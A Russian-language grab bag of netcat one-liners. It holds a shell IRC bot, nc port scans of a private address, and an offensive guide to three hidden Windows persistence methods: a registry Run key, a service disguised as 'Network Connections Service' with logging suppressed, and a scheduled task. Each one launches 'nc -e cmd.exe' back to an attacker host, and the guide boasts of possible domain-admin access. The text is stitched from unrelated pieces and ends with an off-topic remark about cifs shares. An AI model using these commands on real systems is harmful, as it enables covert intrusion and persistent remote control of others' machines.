// это вам не в контакте мышкой тыкать
touch socket; tail -f socket | nc irc.freenode.org 6667 | ( echo "NICK lolbotshort" >> socket; echo "USER aa bb cc dd" >> socket; cat — | while read line; do echo "$line"; echo "$line" | grep -qi "^PING" && { echo "$line" | sed 's/^PING/PONG/' >> socket; }; done; ); rm -f socket
Готовый скелет: paste2.org
nc –z –n –v –w 1 192.168.1.100 1-1024
nc –n –v –w 1 –z 192.168.1.100 20 21 22 25 80 8080
В обоих примерах используются следующие флаги:
-z (zero-input/output mode) (работа без программных задержек);
-n (numeric-only, используем, так как задается IP-адрес, а не домен);
-w (таймаут на коннекты в секундах).
1. Бекдоринг netcat’ом – путем добавления соответствующего ключа в ветку реестра для автозапуска:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d “c:\windows\nc.exe –d 192.168.1.70 1234 –e cmd.exe”
При последующем логине в систему произойдет запуск netcat с открытием шелла на 1234 порту. Нюанс тут в том, что бекдор исполнится с правами того пользователя, который залезет на эту машину. Поэтому такие действия вполне могут открыть доступ полноценного администратора домена.
2. Исполнение бекдора в режиме «Windows Service». Вообще, netcat никогда не был заточен под виндовую службу, но, извратившись, мы можем сделать его таковым:
sc create Network Connections Service binPath= “cmd /K start c:\nc.exe –d 192.168.1.70 1234 –e cmd.exe” start= auto error= ignore
Командой SC создается сервис с несуществующим именем (чтобы в глаза не бросалось) «Network Connections Service». Флаг start= auto указывает, чтобы сервис запускался сразу после загрузки ОС, а error=ignore – запрещает посылать какие-либо логи в системный журнал. Если все сделано правильно, то тебя обрадует надпись «[SC] CreateService SUCCESS». Соль в том, что даже если операционка будет перезапущена, с ее включением бекдор вновь начнет свою работу.
3. Запуск netcat с использованием Windows Task Sheduler (планировщика задач). Как вариант, можно запустить netcat в определенное время, а именно – когда темно и тихо. В этом нам поможет встроенный в Windows планировщик.
net start schedule
at 12:00:00 /every:m,t,w,th,f,s,su “”c:\nc.exe –d 192.168.1.70 1234 –e cmd.exe””
Каждый день (буквы отвечают за дни недели), в 12:00:00 у нас будет открываться шелл.
ЗюЫю хотя если бы cifs сам проверял доступность примонтированных шар, и в случае недоступности срал в логи и отмонтировал шары, было б красивее